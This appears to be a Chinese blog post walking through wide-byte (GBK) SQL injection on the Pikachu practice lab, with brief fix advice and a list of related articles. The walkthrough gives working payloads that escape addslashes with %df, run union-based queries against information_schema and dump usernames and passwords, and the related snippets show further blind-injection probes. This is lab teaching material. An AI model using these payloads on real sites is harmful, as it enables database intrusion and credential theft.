[Pikachu靶场实战系列] SQL注入(宽字节注入)

最新推荐文章于 2024-07-26 13:34:44 发布
最新推荐文章于 2024-07-26 13:34:44 发布
阅读量3.6k 收藏 23
点赞数 2
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/119295166
版权

宽字节注入原理

在数据库中使用了宽字符集(GBK,GB2312等),除了英文都是一个字符占两字节;

MySQL在使用GBK编码的时候,会认为两个字符为一个汉字(ascii>128才能达到汉字范围);

在PHP中使用addslashes函数的时候,会对单引号%27进行转义,在前边加一个反斜杠”\”,变成%5c%27;

可以在前边添加%df,形成%df%5c%27,而数据进入数据库中时前边的%df%5c两字节会被当成一个汉字;

%5c被吃掉了,单引号由此逃逸可以用来闭合语句。

使用PHP函数iconv(‘utf-8’,‘gbk’,$_GET[‘id’]),也可能导致注入产生

修复建议:

(1)使用mysqli_set_charset(GBK)指定字符集

(2)使用mysqli_real_escape_string进行转义

靶场实战

在这里插入图片描述
看一下提示
在这里插入图片描述

输入提示中的名字
在这里插入图片描述
构建pyload

name=kobe%df’ or 1=1#

单引号因为PHP中使用addslashes函数,被转义为\’,编码后就是%5c%27
加上pyload中的%df 后,就是 %df%5c%27 ,然后MySQL在使用GBK编码的时候,会认为两个字符为一个汉字, %df%5c就被解析为一个汉字,%27也就是单引号就成功逃逸了,成功实现闭合,后面就可以通过or 来执行语句了。
在这里插入图片描述
本来想判断一下是否有回显,然后用order by一直说用户名错误,看来应该不能用order by来判断,因为正常回显的情况下有用户id和email两项,我们直接用union select试一下

name=kobe%df’ union select 1,2#

在这里插入图片描述
有回显,那剩下的就是走流程了
查询数据库
在这里插入图片描述
查询表名

name=kobe%df’ union select 1,table_name from information_schema.tables where table_schema=‘pikachu’#

在这里插入图片描述
却发现没有查询成功,返回去看了一下,发现pyload里面有单引号,而在宽字节注入里面单引号是会被转义的,这里面的单引号也不能用之前的方法逃逸了,否则语句无法执行。

为了避免使用引号,采用嵌套查询

name=kobe%df’ union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2#

在这里插入图片描述
查询users的列名

name=kobe%df’ union select (select group_concat(column_name) from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 3,1)),2#

在这里插入图片描述
查询password

name=kobe%df’ union select (select group_concat(username,0x3b,password) from users),2#

在这里插入图片描述

00勇士王子
关注
专栏目录
SQL注入进阶之1宽字节注入攻击(Pikachu漏洞练习平台)
ISNS的博客
02-29 4508
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 宽字节注入攻击可以说是SQL注入的进阶攻击方式,在我之前列出的学习计划体系中,前面的union联合查询注入攻击、布尔盲注、报错注入、时间盲注这几种常见的SQL注入方式,在我之前的博客中已经分析过了,那么今天在下面这些进阶的SQL注入方式中,要翻牌的就是宽字节注入。 原理讲解 接下来的讲解,将以问...
pikachu靶场 :四、SQL注入
qq_43233085的博客
01-30 2587
pikachu靶场 :四、SQL注入概述数字型注入(post)字符型注入(get)insert/update 注入insertupdatedelete 注入sql 盲注基于布尔基于时间宽字节注入 概述 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成...
SQL注入pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 1899
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
记一次墨者学院sql手工宽字节注入(包含使用sqlmap宽字节注入)
最新发布
qq_56035503的博客
07-26 751
总的来说使用sqlmap的前提是需要知道当前漏洞注入是属于宽字节的注入才行,所以也间接证明了手动注入学习的重要性,只有知道了注入的原理,才能正确的使用脚本,同时sql内容的学习也极其关键,如果不能明白其中的原理,在实战中也不发现不了其中的问题。
pikachu靶场sql注入)(宽字节注入和盲注)
weixin_54431413的博客
03-17 3912
一、宽字节注入 1.宽字节注入原理 宽字节注入有addslashes,mysql_real_escape_string,mysql_escape_string等转义的函数,对输入'进行了转义\' 在这个靶场是addslashes(),这个函数对这些进行了转义 单引号(') 双引号(") 反斜杠(\) NULL 但是在下方设置编码时设置为了gbk编码, 利用反斜杠编码为%5c,这里用%df构成(連)字绕过对 ' 的转义 2.首先利用burp抓包 然后用 1%df' union selec
Pikachu靶场 宽字节SQL注入
感谢关注
12-25 631
时,会在前加一个反斜杠,会注释掉。一起被解码成一个汉字 “:上面说到,程序检测到。差不多,为什么不行?原因 :因为程序检测到。继续输入上面的代码,用。时,会在前加一个反斜杠。得到保留,所以注入成功。
Pikachu--宽字节注入--POST
weixin_70770389的博客
03-14 237
pikachu靶场宽字节注入,记录一下自己的作业步骤
pikachu靶场 宽字节注入 SQL注入学习记录
Nobody45678的博客
02-19 471
以下是摘抄的重点字符型的注入点我们都是用单引号来判断的,但是当遇到addslashes()时,单引号会被转义成 ’ ,导致我们用来判断注入点的单引号失效。所以我们的目的就是使转义符 \ 失效、使单引号逃逸。
pikachu靶场通关sql注入
08-10
- *2* *3* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
pikachu靶场sql注入
07-27
- *2* [pikachu靶场通关之sql注入系列](https://blog.csdn.net/qq_51902218/article/details/120333234)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
【信息安全】pikachu-SQL注入
Nicky_Zheng的博客
09-02 374
数字型注入 使用 1 or 1=1#探测,使用burpsuite截断post请求,修改提交的请求 使用 1 or 1=2#探测,使用burpsuite截断post请求,修改提交的请求 说明该处存在SQL注入 接下来需要使用order by 判断列数 oder by 2返回结果正常,说明只有2列 确认列数后,可使用union select获取数据库名、用户名 1 union select database(),user()# 通过information_schema获取当前数据库表名 根据表名
pikachu之特殊注入之搜索型注入、xx型注入、insert/update注入、delete注入、宽字节注入
2301_80661529的博客
03-02 1314
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。
SQL注入--宽字节注入
weixin_44940180的博客
08-04 774
什么是宽字节 当某字符的大小为一个字节时,称其字符为窄字节 当某字符的大小为两个字节时,称其字符为宽字节 所有英文默认占一个字节,汉字占两个字节 常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 使用宽字节注入的前提 数据库使用了gbk编码 使用了过滤函数,将用户输入的单引号转义(mysql_real_escape_string,addslashes) 这样被处理后的sql语句中,单引号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号
一文了解pikachuSQL注入
allintao的博客
03-01 2775
本文章主要讲解关于pikachu的注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 5148
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
宽字节注入
土拨鼠挖洞中的博客
06-23 319
由于php中,转义函数的存在,导致在' 等字符前加转义字符\,即  \' 导致 ' 被转义,无法注入;但通过输入%df和函数执行添加的%5C,被合并成%df%5C。由于GBK是两字节,这个%df%5C被MYSQL识别为GBK。导致本应的%df\变成%df%5C。%df%5C在GBK编码中没有对应,所以被当成无效字符。 %DF’ :会被PHP当中的addslashes函数转义为“%DF\'”,“\”...
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 2736
pikachu靶场通关之sql注入
pikachu-SQL注入
qq_43660551的博客
05-11 1674
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()之前务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
SQL注入教程——(四)宽字节注入
热门推荐
hijack89的博客
07-27 2万+
前言在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。涉及到的基本概念 字符、字符集 字符(character)是组成字符集(character set)的基本单位。对字符赋予一个数值(en
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值